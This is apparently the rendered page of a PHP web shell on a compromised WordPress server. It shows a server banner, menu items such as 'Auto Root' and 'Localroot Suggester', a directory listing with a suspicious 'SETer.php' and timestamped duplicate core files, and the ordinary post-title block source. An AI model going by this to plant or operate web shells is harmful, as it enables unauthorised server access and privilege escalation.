Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.148.182.104
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
SETer.php
166.01
KB
-rw-r--r--
2025-03-30 05:28
block-bindings-20250514173405.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
4.3
KB
-rw-r--r--
2025-04-15 17:44
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-json.php
42.66
KB
-rw-r--r--
2023-02-03 13:35
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class-wp-user.php
22.46
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
comment-date-20250514173159.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comment-date.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comments-title.php
2.71
KB
-rw-r--r--
2024-07-16 17:55
data.min.js
25
KB
-rw-r--r--
2025-04-15 17:44
default-widgets.php
2.24
KB
-rw-r--r--
2025-04-15 17:44
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
editor-rtl.css
1.56
KB
-rw-r--r--
2024-04-03 05:49
editor-rtl.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
editor.css
856
B
-rw-r--r--
2024-07-16 17:55
editor.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
element.min.js
11.69
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-network-20250514173520.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
post-title.php
2.09
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
site-title.php
1.81
KB
-rw-r--r--
2025-04-15 17:44
speculative-loading.php
8.36
KB
-rw-r--r--
2025-04-15 17:44
style-engine-20250514173207.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style-rtl.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
style.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
theme-rtl.css
261
B
-rw-r--r--
2024-07-16 17:55
theme-rtl.min.css
232
B
-rw-r--r--
2024-07-16 17:55
theme.css
261
B
-rw-r--r--
2024-07-16 17:55
theme.min.css
232
B
-rw-r--r--
2024-07-16 17:55
Save
Rename
<?php /** * Server-side rendering of the `core/post-title` block. * * @package WordPress */ /** * Renders the `core/post-title` block on the server. * * @since 6.3.0 Omitting the $post argument from the `get_the_title`. * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * * @return string Returns the filtered post title for the current post wrapped inside "h1" tags. */ function render_block_core_post_title( $attributes, $content, $block ) { if ( ! isset( $block->context['postId'] ) ) { return ''; } /** * The `$post` argument is intentionally omitted so that changes are reflected when previewing a post. * See: https://github.com/WordPress/gutenberg/pull/37622#issuecomment-1000932816. */ $title = get_the_title(); if ( ! $title ) { return ''; } $tag_name = 'h2'; if ( isset( $attributes['level'] ) ) { $tag_name = 0 === $attributes['level'] ? 'p' : 'h' . (int) $attributes['level']; } if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) { $rel = ! empty( $attributes['rel'] ) ? 'rel="' . esc_attr( $attributes['rel'] ) . '"' : ''; $title = sprintf( '<a href="%1$s" target="%2$s" %3$s>%4$s</a>', esc_url( get_the_permalink( $block->context['postId'] ) ), esc_attr( $attributes['linkTarget'] ), $rel, $title ); } $classes = array(); if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); return sprintf( '<%1$s %2$s>%3$s</%1$s>', $tag_name, $wrapper_attributes, $title ); } /** * Registers the `core/post-title` block on the server. * * @since 5.8.0 */ function register_block_core_post_title() { register_block_type_from_metadata( __DIR__ . '/post-title', array( 'render_callback' => 'render_block_core_post_title', ) ); } add_action( 'init', 'register_block_core_post_title' );